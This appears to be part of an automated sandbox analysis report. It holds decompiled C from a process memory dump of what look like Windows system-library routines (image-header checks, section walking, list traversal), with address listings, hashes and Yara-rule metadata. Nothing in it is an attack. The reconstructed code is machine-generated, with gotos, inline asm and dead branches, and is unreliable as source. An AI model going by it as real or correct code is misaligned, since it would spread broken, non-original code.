										_t208 = E00B46B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E00B46AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E00AAE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L00AAEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = L00AD9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E00AAE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L00AA8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E00AD3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x00aad5f2
0x00aad5f5
0x00aad5f5
0x00aad5fd
0x00aad600
0x00aad60a
0x00aad60d
0x00aad617
0x00aad61d
0x00aad627
0x00aad62e
0x00aad911
0x00aad913
0x00000000
0x00aad919
0x00aad919
0x00aad919
0x00aad634
0x00aad634
0x00aad634
0x00aad634
0x00aad640
0x00aad8bf
0x00000000
0x00aad646
0x00aad646
0x00aad64d
0x00aad652
0x00afb2fc
0x00afb2fc
0x00afb302
0x00afb33b
0x00afb341
0x00000000
0x00afb304
0x00afb304
0x00afb319
0x00afb31e
0x00afb324
0x00afb326
0x00afb332
0x00afb347
0x00afb34c
0x00afb351
0x00afb35a
0x00000000
0x00afb328
0x00afb328
0x00000000
0x00afb328
0x00afb326
0x00aad658
0x00aad658
0x00aad65b
0x00aad665
0x00000000
0x00aad66b
0x00aad66b
0x00aad66b
0x00aad66b
0x00aad66d
0x00aad672
0x00aad67a
0x00000000
0x00000000
0x00aad680
0x00aad686
0x00aad8ce
0x00aad8d4
0x00aad8dd
0x00aad8e0
0x00aad68c
0x00aad691
0x00aad69d
0x00aad6a2
0x00aad6a7
0x00aad6b0
0x00aad6b5
0x00aad6e0
0x00aad6b7
0x00aad6b7
0x00aad6b9
0x00aad6b9
0x00aad6bb
0x00aad6bd
0x00aad6ce
0x00aad6d0
0x00aad6d2
0x00afb363
0x00afb365
0x00000000
0x00afb36b
0x00000000
0x00afb36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00aad6bf
0x00aad6bf
0x00aad6e5
0x00aad6e7
0x00aad6e9
0x00aad6ec
0x00aad6ec
0x00aad6ef
0x00aad6f5
0x00aad6f9
0x00aad6fb
0x00aad6fd
0x00aad701
0x00aad703
0x00aad70a
0x00aad70a
0x00aad701
0x00aad710
0x00aad710
0x00aad6c1
0x00aad6c1
0x00aad6c6
0x00afb36d
0x00afb36f
0x00000000
0x00afb375
0x00afb375
0x00afb375
0x00000000
0x00afb375
0x00000000
0x00aad6cc
0x00aad6d8
0x00aad6d8
0x00aad6d8
0x00000000
0x00aad6c6
0x00aad6bf
0x00000000
0x00aad6da
0x00aad6da
0x00aad716
0x00aad71b
0x00aad720
0x00aad726
0x00aad726
0x00aad72d
0x00000000
0x00aad733
0x00aad739
0x00aad742
0x00aad750
0x00aad758
0x00aad764
0x00aad776
0x00aad77a
0x00aad783
0x00aad928
0x00aad92c
0x00aad93d
0x00aad944
0x00aad94f
0x00aad954
0x00aad956
0x00aad95f
0x00aad961
0x00aad973
0x00aad973
0x00aad956
0x00aad944
0x00aad92c
0x00aad78b
0x00afb394
0x00aad791
0x00aad798
0x00afb3a3
0x00afb3bb
0x00afb3bb
0x00aad7a5
0x00aad866
0x00aad870
0x00aad892
0x00aad898
0x00aad89e
0x00aad8a0
0x00aad8a6
0x00aad8ac
0x00aad8ae
0x00aad8b4
0x00aad8b4
0x00aad8ae
0x00aad7a5
0x00aad78b
0x00aad7b1
0x00afb3c5
0x00afb3c5
0x00aad7c3
0x00aad7ca
0x00aad7e5
0x00aad7eb
0x00aad8eb
0x00aad8ed
0x00000000
0x00aad8f3
0x00aad8f3
0x00aad8f3
0x00000000
0x00aad8ed
0x00aad7cc
0x00aad7cc
0x00aad7d2
0x00000000
0x00aad7d4
0x00aad7d4
0x00aad7d7
0x00aad7df
0x00afb3d4
0x00afb3d9
0x00afb3dc
0x00afb3dc
0x00afb3df
0x00afb3e2
0x00afb468
0x00afb46d
0x00afb46f
0x00afb46f
0x00afb475
0x00aad8f8
0x00aad8f9
0x00aad8fd
0x00afb3e8
0x00afb3e8
0x00afb3eb
0x00afb3ed
0x00000000
0x00afb3ef
0x00afb3ef
0x00afb3f1
0x00afb3f4
0x00afb3fe
0x00afb404
0x00afb409
0x00afb40e
0x00afb410
0x00afb410
0x00afb414
0x00afb414
0x00afb41b
0x00afb420
0x00afb423
0x00afb425
0x00afb427
0x00afb42a
0x00afb42d
0x00afb42d
0x00afb42a
0x00afb432
0x00afb436
0x00afb438
0x00afb43b
0x00afb43b
0x00afb449
0x00afb44e
0x00afb454
0x00afb458
0x00afb458
0x00afb45d
0x00000000
0x00afb45d
0x00afb3ed
0x00000000
0x00000000
0x00000000
0x00aad7df
0x00aad7d2
0x00aad7ca
0x00afb37c
0x00afb37e
0x00afb385
0x00afb38a
0x00000000
0x00afb38a
0x00aad742
0x00aad7f1
0x00aad7f8
0x00afb49b
0x00afb49b
0x00aad800
0x00aad837
0x00aad843
0x00aad845
0x00aad847
0x00aad84a
0x00aad84b
0x00aad84e
0x00aad857
0x00aad818
0x00aad824
0x00aad831
0x00afb4a5
0x00afb4ab
0x00afb4b3
0x00afb4b8
0x00afb4bb
0x00000000
0x00afb4c1
0x00afb4c1
0x00afb4c8
0x00000000
0x00afb4ce
0x00afb4d4
0x00afb4e1
0x00afb4e3
0x00afb4e5
0x00000000
0x00afb4eb
0x00afb4f0
0x00afb4f2
0x00aadac9
0x00aadacc
0x00aadacf
0x00aadad1
0x00aadd78
0x00aadd78
0x00aadcf2
0x00000000
0x00aadad7
0x00aadad9
0x00aadadb
0x00000000
0x00000000
0x00aadae1
0x00aadae1
0x00aadae4
0x00aadae6
0x00afb4f9
0x00afb4f9
0x00afb500
0x00aadaec
0x00aadaec
0x00aadaf5
0x00aadaf8
0x00aadafb
0x00aadb03
0x00aadb11
0x00aadb16
0x00aadb19
0x00aadb1b
0x00afb52c
0x00afb531
0x00afb534
0x00aadb21
0x00aadb21
0x00aadb24
0x00aadcd9
0x00aadce2
0x00aadce5
0x00aadd6a
0x00aadd6d
0x00000000
0x00aadd73
0x00afb51a
0x00afb51c
0x00afb51f
0x00afb524
0x00000000
0x00afb524
0x00aadce7
0x00aadce7
0x00aadce7
0x00000000
0x00aadce7
0x00000000
0x00aadb2a
0x00aadb2c
0x00aadb31
0x00aadb33
0x00aadb36
0x00aadb39
0x00aadb3b
0x00aadb66
0x00aadb66
0x00aadb3d
0x00aadb3d
0x00aadb3e
0x00aadb46
0x00aadb47
0x00aadb49
0x00aadb4c
0x00aadb53
0x00aadb55
0x00aadb58
0x00aadb5a
0x00afb50a
0x00afb50f
0x00afb512
0x00aadb60
0x00aadb60
0x00aadb63
0x00aadb63
0x00000000
0x00aadb63
0x00aadb5a
0x00aadb3b
0x00aadb24
0x00aadb69
0x00aadb69
0x00aadb6c
0x00aadb6f
0x00aadb74
0x00afb557
0x00afb557
0x00afb55e
0x00aadb7a
0x00aadb7c
0x00aadb7f
0x00aadb82
0x00aadb85
0x00000000
0x00aadb8b
0x00aadb8b
0x00aadb8d
0x00aadb9b
0x00aadb9b
0x00aadb9d
0x00aadba0
0x00aadba2
0x00aadba4
0x00aadba7
0x00aadba9
0x00aadbae
0x00aadbae
0x00aadbb1
0x00aadbb4
0x00aadbb4
0x00aadbb7
0x00aadbba
0x00aadcd2
0x00aadcd4
0x00000000
0x00aadbc0
0x00aadbc0
0x00aadbd2
0x00aadbd7
0x00aadbda
0x00aadbdd
0x00aadbdf
0x00000000
0x00aadbe5
0x00aadbe5
0x00aadbee
0x00aadbf1
0x00afb541
0x00afb544
0x00000000
0x00afb546
0x00afb546
0x00000000
0x00afb546
0x00aadbf7
0x00aadbf7
0x00aadbfd
0x00aadbfd
0x00aadbff
0x00aadc0b
0x00aadc15
0x00aadc1b
0x00aadc1d
0x00aadc21
0x00aadc21
0x00aadc23
0x00aadc23
0x00aadc26
0x00aadc29
0x00aadc2b
0x00000000
0x00000000
0x00aadc31
0x00aadc34
0x00aadc36
0x00aadcbf
0x00aadcbf
0x00aadcc2
0x00000000
0x00aadc3c
0x00aadc41
0x00aadc43
0x00000000
0x00aadc45
0x00aadc45
0x00aadc47
0x00000000
0x00aadc4d
0x00aadc4d
0x00aadc50
0x00aadc52
0x00aadc55
0x00aadcfa
0x00aadcfe
0x00aadd08
0x00aadd0a
0x00aadd0c
0x00000000
0x00aadd12
0x00aadd15
0x00aadd2d
0x00aadd2f
0x00aadd32
0x00aadd35
0x00000000
0x00aadd35
0x00aadc5b
0x00aadc5b
0x00aadc5e
0x00aadc61
0x00aadc64
0x00aadc67
0x00aadc67
0x00aadc6a
0x00aadc6c
0x00aadc8e
0x00aadc8e
0x00aadc91
0x00aadc93
0x00aadcce
0x00aadcce
0x00aadc95
0x00aadc9c
0x00aadc6e
0x00aadc72
0x00aadc75
0x00aadc77
0x00aadc79
0x00afb551
0x00afb551
0x00000000
0x00aadc7f
0x00aadc7f
0x00aadc81
0x00000000
0x00aadc83
0x00aadc86
0x00aadc88
0x00000000
0x00000000
0x00000000
0x00000000
0x00aadc88
0x00aadc81
0x00aadc79
0x00aadc6c
0x00aadc55
0x00aadc47
0x00aadc43
0x00000000
0x00aadc36
0x00aadc23
0x00000000
0x00aadbff
0x00aadbf1
0x00aadbdf
0x00aadb8f
0x00aadb92
0x00aadb95
0x00000000
0x00000000
0x00000000
0x00000000
0x00aadb95
0x00aadb8d
0x00aadb85
0x00aadb74
0x00aadc9f
0x00aadca2
0x00aadcb0
0x00aadcb0
0x00aadad1
0x00afb4e5
0x00afb4c8
0x00000000
0x00000000
0x00000000
0x00aad831
0x00000000
0x00aad800
0x00afb47f
0x00afb485
0x00000000
0x00afb485
0x00aad665
0x00aad652
0x00000000

Strings

X*c, xrefs: 00AAD8CE
H/c, xrefs: 00AAD69D

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: H/c$X*c
API String ID: 0-886039989
Opcode ID: 653e74a5533eddaf27fb17c2e450af8721cd4592c1c179db7982725ebd40dafd
Instruction ID: ef51db63da0d37be4952d2fe29f7177d477fa1c7f31300883faf62e5be791cba
Opcode Fuzzy Hash: 653e74a5533eddaf27fb17c2e450af8721cd4592c1c179db7982725ebd40dafd
Instruction Fuzzy Hash: E9E1C230A00359CFDB34DF68C944BB9B7B2BF46304F144199E98A9BAE1DB349D81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B5E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00B5E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E00B5BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E00B5BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							L00B5AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(L00AD9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E00B5A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E00B5A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(L00AD9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E00B5A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E00B5A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E00AB2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00AAB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									L00AAFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E00AB7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E00B4FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x00b5e547
0x00b5e549
0x00b5e54f
0x00b5e553
0x00b5e557
0x00b5e55a
0x00b5e55c
0x00b5e55f
0x00b5e561
0x00b5e567
0x00b5e56b
0x00b5e7e2
0x00000000
0x00b5e571
0x00b5e575
0x00b5e577
0x00b5e57b
0x00b5e57c
0x00b5e57d
0x00b5e57e
0x00b5e57f
0x00b5e588
0x00b5e58f
0x00b5e591
0x00b5e592
0x00b5e592
0x00b5e596
0x00b5e59e
0x00b5e5a0
0x00b5e5a6
0x00b5e61d
0x00b5e61d
0x00b5e621
0x00b5e623
0x00b5e630
0x00b5e630
0x00b5e7e6
0x00b5e7eb
0x00b5e7ed
0x00b5e7f4
0x00b5e7fa
0x00b5e7ff
0x00b5e7ff
0x00b5e80a
0x00b5e812
0x00b5e812
0x00b5e5ab
0x00b5e5b4
0x00b5e5b9
0x00b5e5be
0x00b5e5c0
0x00b5e5c2
0x00b5e5c8
0x00b5e5c9
0x00b5e5cb
0x00b5e5cc
0x00b5e5d5
0x00b5e5e4
0x00b5e5f1
0x00b5e5f8
0x00b5e5f8
0x00b5e5d5
0x00b5e602
0x00b5e616
0x00b5e63d
0x00b5e644
0x00b5e64d
0x00b5e652
0x00b5e657
0x00b5e659
0x00b5e65b
0x00b5e661
0x00b5e662
0x00b5e664
0x00b5e665
0x00b5e66e
0x00b5e67d
0x00b5e68a
0x00b5e691
0x00b5e691
0x00b5e66e
0x00b5e6b0
0x00000000
0x00b5e6b6
0x00b5e6bd
0x00b5e6c7
0x00b5e6d7
0x00b5e6d9
0x00b5e6db
0x00b5e6de
0x00b5e6e3
0x00b5e6f3
0x00b5e6fc
0x00b5e700
0x00b5e700
0x00b5e704
0x00b5e70a
0x00b5e70a
0x00b5e713
0x00b5e716
0x00b5e719
0x00b5e720
0x00b5e761
0x00b5e76b
0x00b5e774
0x00b5e77a
0x00b5e77a
0x00b5e78a
0x00b5e791
0x00b5e799
0x00b5e79b
0x00b5e79f
0x00b5e7aa
0x00b5e7c0
0x00b5e7ac
0x00b5e7b2
0x00b5e7b9
0x00b5e7b9
0x00b5e7c7
0x00b5e806
0x00000000
0x00b5e7c9
0x00b5e7d1
0x00b5e7d8
0x00000000
0x00b5e7d8
0x00000000
0x00000000
0x00b5e722
0x00b5e72e
0x00b5e748
0x00b5e74c
0x00b5e754
0x00b5e756
0x00b5e75c
0x00b5e75c
0x00000000
0x00b5e75c
0x00b5e758
0x00b5e758
0x00000000
0x00b5e758
0x00b5e750
0x00000000
0x00000000
0x00b5e752
0x00000000
0x00b5e752
0x00b5e730
0x00b5e735
0x00b5e73d
0x00b5e73f
0x00000000
0x00000000
0x00b5e741
0x00b5e741
0x00000000
0x00b5e741
0x00b5e739
0x00000000
0x00000000
0x00b5e73b
0x00000000
0x00b5e73b
0x00b5e722
0x00b5e720
0x00b5e6b0
0x00b5e618
0x00000000
0x00b5e618

Strings

`, xrefs: 00B5E670
`, xrefs: 00B5E5D7

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 1ad40a88607d05e013ffce687190feddfc012ee6ff2a98aa2e89bbb5f76e8ce7
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 7491BE712043419FE728CE25C941B1BB7E5FF88715F1489ADF9A9CB280E770EA08CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B151BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00B151BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xb705f0);
				E00AED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00AAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00B153CA(0);
						return E00AED130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00ADF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00AB3690(1, _t117, 0xa71810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00ADAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00AB4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00ADAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
